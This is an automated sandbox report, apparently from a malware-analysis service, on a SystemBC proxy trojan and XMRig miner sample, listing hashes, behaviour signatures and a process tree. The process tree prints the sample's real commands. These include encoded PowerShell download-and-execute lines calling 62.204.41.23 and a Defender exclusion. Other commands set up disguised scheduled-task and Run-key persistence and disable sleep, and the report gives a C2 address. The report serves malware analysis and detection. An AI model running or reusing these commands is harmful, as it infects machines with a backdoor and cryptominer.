systembc | d540f75897495102dd30eaa924623ac40415e8a716bdcbadf7d7c9a00feb5c97

Analysis

max time kernel
150s
max time network
144s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
04-05-2023 11:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file.exe
Size

95KB
MD5

92e79e8ed958f7289702c96fe03de5a5
SHA1

e16dede58a351b4bcc4e7b973fdec6c3ec3e98ce
SHA256

d540f75897495102dd30eaa924623ac40415e8a716bdcbadf7d7c9a00feb5c97
SHA512

fa0225f2f28eefd066a4d803586f7edcd3416b05c64ee6070e3d55a327ba7d68d245b7f669975d9aa34d7edc3a585fe05e633a38dfa19469488c58e09b832943
SSDEEP

1536:BfbO0u8DiUPCrElGBWHNC68MVlPjgNJiWUex4bmR+w/Y2tKSG8xB2ncSVKC29m+l:VbEUPCrElGsHNC68MVlPjgNJiWUexfNh

Score

10^/10

systembc xmrig evasion miner persistence trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.23/file.png

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.23/o.png

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.23/r.png

Extracted

Family

systembc

185.161.248.16:4440

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs

Processes:

OneDrive.exeOneDrive.execonhost.exe

description	pid	process	target process
PID 1624 created 1200	1624	OneDrive.exe	Explorer.EXE
PID 1624 created 1200	1624	OneDrive.exe	Explorer.EXE
PID 1624 created 1200	1624	OneDrive.exe	Explorer.EXE
PID 1800 created 1200	1800	OneDrive.exe	Explorer.EXE
PID 1800 created 1200	1800	OneDrive.exe	Explorer.EXE
PID 1800 created 1200	1800	OneDrive.exe	Explorer.EXE
PID 564 created 1200	564	conhost.exe	Explorer.EXE
PID 564 created 1200	564	conhost.exe	Explorer.EXE
PID 564 created 1200	564	conhost.exe	Explorer.EXE
PID 564 created 1200	564	conhost.exe	Explorer.EXE
PID 1800 created 1200	1800	OneDrive.exe	Explorer.EXE

SystemBC
SystemBC is a proxy and remote administration tool first seen in 2019.
trojan systembc
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

dllhost.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ dllhost.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	dllhost.exe

XMRig Miner payload 7 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/1800-216-0x000000013F840000-0x000000014020A000-memory.dmp	xmrig
behavioral1/memory/1800-234-0x000000013F840000-0x000000014020A000-memory.dmp	xmrig
behavioral1/memory/640-240-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/640-248-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/640-252-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/640-256-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/640-260-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig

Blocklisted process makes network request 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

flow pid process

5 760 powershell.exe
6 1120 powershell.exe
7 1056 powershell.exe
10 1056 powershell.exe
11 1056 powershell.exe
Downloads MZ/PE file

flow	pid	process
5	760	powershell.exe
6	1120	powershell.exe
7	1056	powershell.exe
10	1056	powershell.exe
11	1056	powershell.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

dllhost.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	dllhost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	dllhost.exe

Executes dropped EXE 5 IoCs

Processes:

OneDrive.exedllhost.exelsass.exeOneDrive.exelsass.exe

pid process

1624 OneDrive.exe
944 dllhost.exe
676 lsass.exe
1800 OneDrive.exe
272 lsass.exe
Identifies Wine through registry keys 2 TTPs 1 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

dllhost.exe

description ioc process

Key opened \REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000\Software\Wine dllhost.exe
Loads dropped DLL 3 IoCs

Processes:

powershell.exetaskeng.exelsass.exe

pid process

1056 powershell.exe
1972 taskeng.exe
676 lsass.exe

pid	process
1624	OneDrive.exe
944	dllhost.exe
676	lsass.exe
1800	OneDrive.exe
272	lsass.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-1563773381-2037468142-1146002597-1000\Software\Wine	dllhost.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

lsass.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\\ProgramData\\lsass\\lsass.exe"	lsass.exe

Drops file in System32 directory 4 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs

Processes:

dllhost.exelsass.exelsass.exe

pid process

944 dllhost.exe
676 lsass.exe
676 lsass.exe
272 lsass.exe
272 lsass.exe
272 lsass.exe
272 lsass.exe
272 lsass.exe
272 lsass.exe
272 lsass.exe

pid	process
944	dllhost.exe
676	lsass.exe
676	lsass.exe
272	lsass.exe
272	lsass.exe
272	lsass.exe
272	lsass.exe
272	lsass.exe
272	lsass.exe
272	lsass.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

OneDrive.exe

description	pid	process	target process
PID 1800 set thread context of 564	1800	OneDrive.exe	conhost.exe
PID 1800 set thread context of 640	1800	OneDrive.exe	conhost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

1256 schtasks.exe
1516 schtasks.exe
1256 schtasks.exe
1712 schtasks.exe
588 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

776 timeout.exe
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

lsass.exe

pid process

272 lsass.exe

pid	process
1256	schtasks.exe
1516	schtasks.exe
1256	schtasks.exe
1712	schtasks.exe
588	schtasks.exe

pid	process
776	timeout.exe

pid	process
272	lsass.exe

Suspicious behavior: EnumeratesProcesses 37 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exeOneDrive.exepowershell.exedllhost.exeOneDrive.exepowershell.execonhost.exepowershell.exepowershell.exe

pid	process
1056	powershell.exe
1072	powershell.exe
1120	powershell.exe
760	powershell.exe
1056	powershell.exe
1056	powershell.exe
1624	OneDrive.exe
1624	OneDrive.exe
1624	OneDrive.exe
1624	OneDrive.exe
1056	powershell.exe
1056	powershell.exe
2016	powershell.exe
944	dllhost.exe
1624	OneDrive.exe
1624	OneDrive.exe
1056	powershell.exe
1056	powershell.exe
1800	OneDrive.exe
1800	OneDrive.exe
1800	OneDrive.exe
1800	OneDrive.exe
856	powershell.exe
1800	OneDrive.exe
1800	OneDrive.exe
564	conhost.exe
564	conhost.exe
948	powershell.exe
564	conhost.exe
564	conhost.exe
564	conhost.exe
564	conhost.exe
320	powershell.exe
564	conhost.exe
564	conhost.exe
1800	OneDrive.exe
1800	OneDrive.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

464

pid	process
464

Suspicious use of AdjustPrivilegeToken 20 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.exepowercfg.exepowercfg.exepowershell.exepowercfg.exepowercfg.exelsass.exelsass.exepowershell.exepowershell.execonhost.exe

description	pid	process
Token: SeDebugPrivilege	1056	powershell.exe
Token: SeDebugPrivilege	1072	powershell.exe
Token: SeDebugPrivilege	1120	powershell.exe
Token: SeDebugPrivilege	760	powershell.exe
Token: SeShutdownPrivilege	1380	powercfg.exe
Token: SeShutdownPrivilege	1512	powercfg.exe
Token: SeShutdownPrivilege	1704	powercfg.exe
Token: SeShutdownPrivilege	1312	powercfg.exe
Token: SeDebugPrivilege	2016	powershell.exe
Token: SeShutdownPrivilege	1064	powercfg.exe
Token: SeShutdownPrivilege	564	powercfg.exe
Token: SeDebugPrivilege	856	powershell.exe
Token: SeShutdownPrivilege	1444	powercfg.exe
Token: SeShutdownPrivilege	1708	powercfg.exe
Token: SeDebugPrivilege	676	lsass.exe
Token: SeDebugPrivilege	272	lsass.exe
Token: SeDebugPrivilege	948	powershell.exe
Token: SeDebugPrivilege	320	powershell.exe
Token: SeLockMemoryPrivilege	640	conhost.exe
Token: SeLockMemoryPrivilege	640	conhost.exe

Suspicious use of FindShellTrayWindow 49 IoCs

Processes:

conhost.exe

pid	process
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe

Suspicious use of SendNotifyMessage 49 IoCs

Processes:

conhost.exe

pid	process
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe
640	conhost.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

lsass.exelsass.exe

pid process

676 lsass.exe
272 lsass.exe

pid	process
676	lsass.exe
272	lsass.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

file.exepowershell.execmd.exepowershell.exetaskeng.execmd.exepowershell.exelsass.exe

description	pid	process	target process
PID 324 wrote to memory of 1072	324	file.exe	powershell.exe
PID 324 wrote to memory of 1072	324	file.exe	powershell.exe
PID 324 wrote to memory of 1072	324	file.exe	powershell.exe
PID 324 wrote to memory of 1120	324	file.exe	powershell.exe
PID 324 wrote to memory of 1120	324	file.exe	powershell.exe
PID 324 wrote to memory of 1120	324	file.exe	powershell.exe
PID 324 wrote to memory of 1056	324	file.exe	powershell.exe
PID 324 wrote to memory of 1056	324	file.exe	powershell.exe
PID 324 wrote to memory of 1056	324	file.exe	powershell.exe
PID 324 wrote to memory of 760	324	file.exe	powershell.exe
PID 324 wrote to memory of 760	324	file.exe	powershell.exe
PID 324 wrote to memory of 760	324	file.exe	powershell.exe
PID 1056 wrote to memory of 1624	1056	powershell.exe	OneDrive.exe
PID 1056 wrote to memory of 1624	1056	powershell.exe	OneDrive.exe
PID 1056 wrote to memory of 1624	1056	powershell.exe	OneDrive.exe
PID 1712 wrote to memory of 1380	1712	cmd.exe	powercfg.exe
PID 1712 wrote to memory of 1380	1712	cmd.exe	powercfg.exe
PID 1712 wrote to memory of 1380	1712	cmd.exe	powercfg.exe
PID 1056 wrote to memory of 944	1056	powershell.exe	dllhost.exe
PID 1056 wrote to memory of 944	1056	powershell.exe	dllhost.exe
PID 1056 wrote to memory of 944	1056	powershell.exe	dllhost.exe
PID 1056 wrote to memory of 944	1056	powershell.exe	dllhost.exe
PID 1712 wrote to memory of 1512	1712	cmd.exe	powercfg.exe
PID 1712 wrote to memory of 1512	1712	cmd.exe	powercfg.exe
PID 1712 wrote to memory of 1512	1712	cmd.exe	powercfg.exe
PID 1712 wrote to memory of 1704	1712	cmd.exe	powercfg.exe
PID 1712 wrote to memory of 1704	1712	cmd.exe	powercfg.exe
PID 1712 wrote to memory of 1704	1712	cmd.exe	powercfg.exe
PID 1712 wrote to memory of 1312	1712	cmd.exe	powercfg.exe
PID 1712 wrote to memory of 1312	1712	cmd.exe	powercfg.exe
PID 1712 wrote to memory of 1312	1712	cmd.exe	powercfg.exe
PID 2016 wrote to memory of 1256	2016	powershell.exe	schtasks.exe
PID 2016 wrote to memory of 1256	2016	powershell.exe	schtasks.exe
PID 2016 wrote to memory of 1256	2016	powershell.exe	schtasks.exe
PID 1056 wrote to memory of 676	1056	powershell.exe	lsass.exe
PID 1056 wrote to memory of 676	1056	powershell.exe	lsass.exe
PID 1056 wrote to memory of 676	1056	powershell.exe	lsass.exe
PID 1056 wrote to memory of 676	1056	powershell.exe	lsass.exe
PID 1972 wrote to memory of 1800	1972	taskeng.exe	OneDrive.exe
PID 1972 wrote to memory of 1800	1972	taskeng.exe	OneDrive.exe
PID 1972 wrote to memory of 1800	1972	taskeng.exe	OneDrive.exe
PID 768 wrote to memory of 1064	768	cmd.exe	powercfg.exe
PID 768 wrote to memory of 1064	768	cmd.exe	powercfg.exe
PID 768 wrote to memory of 1064	768	cmd.exe	powercfg.exe
PID 768 wrote to memory of 564	768	cmd.exe	powercfg.exe
PID 768 wrote to memory of 564	768	cmd.exe	powercfg.exe
PID 768 wrote to memory of 564	768	cmd.exe	powercfg.exe
PID 768 wrote to memory of 1444	768	cmd.exe	powercfg.exe
PID 768 wrote to memory of 1444	768	cmd.exe	powercfg.exe
PID 768 wrote to memory of 1444	768	cmd.exe	powercfg.exe
PID 768 wrote to memory of 1708	768	cmd.exe	powercfg.exe
PID 768 wrote to memory of 1708	768	cmd.exe	powercfg.exe
PID 768 wrote to memory of 1708	768	cmd.exe	powercfg.exe
PID 856 wrote to memory of 1516	856	powershell.exe	schtasks.exe
PID 856 wrote to memory of 1516	856	powershell.exe	schtasks.exe
PID 856 wrote to memory of 1516	856	powershell.exe	schtasks.exe
PID 676 wrote to memory of 1256	676	lsass.exe	schtasks.exe
PID 676 wrote to memory of 1256	676	lsass.exe	schtasks.exe
PID 676 wrote to memory of 1256	676	lsass.exe	schtasks.exe
PID 676 wrote to memory of 1256	676	lsass.exe	schtasks.exe
PID 676 wrote to memory of 272	676	lsass.exe	lsass.exe
PID 676 wrote to memory of 272	676	lsass.exe	lsass.exe
PID 676 wrote to memory of 272	676	lsass.exe	lsass.exe
PID 676 wrote to memory of 272	676	lsass.exe	lsass.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1200

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:324

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwA
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1072

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBmAGkAbABlAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==
3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1056

C:\Users\Admin\AppData\Roaming\OneDrive.exe
"C:\Users\Admin\AppData\Roaming\OneDrive.exe"
4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1624

C:\Users\Admin\AppData\Roaming\dllhost.exe
"C:\Users\Admin\AppData\Roaming\dllhost.exe"
4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:944

C:\Users\Admin\AppData\Roaming\lsass.exe
"C:\Users\Admin\AppData\Roaming\lsass.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:676

C:\Windows\SysWOW64\schtasks.exe
"schtasks.exe" /create /tn OneDrive /tr "C:\ProgramData\lsass\lsass.exe" /st 11:11 /du 23:59 /sc daily /ri 1 /f
5⤵
- Creates scheduled task(s)
PID:1256

C:\ProgramData\lsass\lsass.exe
"C:\ProgramData\lsass\lsass.exe"
5⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:272

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp1121.tmp.bat""
5⤵
PID:1568

C:\Windows\SysWOW64\timeout.exe
timeout 7
6⤵
- Delays execution with timeout.exe
PID:776

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBvAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1120

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwByAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:760

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
- Suspicious use of WriteProcessMemory
PID:1712

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1380

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1704

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1312

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1512

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2016

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn OneDrive /tr 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe'
3⤵
- Creates scheduled task(s)
PID:1256

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "OneDrive"
2⤵
PID:1168

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:856

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn OneDrive /tr 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe'
3⤵
- Creates scheduled task(s)
PID:1516

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
- Suspicious use of WriteProcessMemory
PID:768

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1064

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:564

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1444

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1708

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:564

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#husln#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:948

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn OneDrive /tr 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe'
3⤵
- Creates scheduled task(s)
PID:1712

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "OneDrive"
2⤵
PID:1848

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#husln#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:320

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn OneDrive /tr 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe'
3⤵
- Creates scheduled task(s)
PID:588

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "OneDrive"
2⤵
PID:760

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:640

C:\Windows\system32\taskeng.exe
taskeng.exe {2C8EE0CA-7E9C-4078-9BA5-372B78652449} S-1-5-21-1563773381-2037468142-1146002597-1000:YBHADZIG\Admin:Interactive:[1]
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1972

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:1800

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

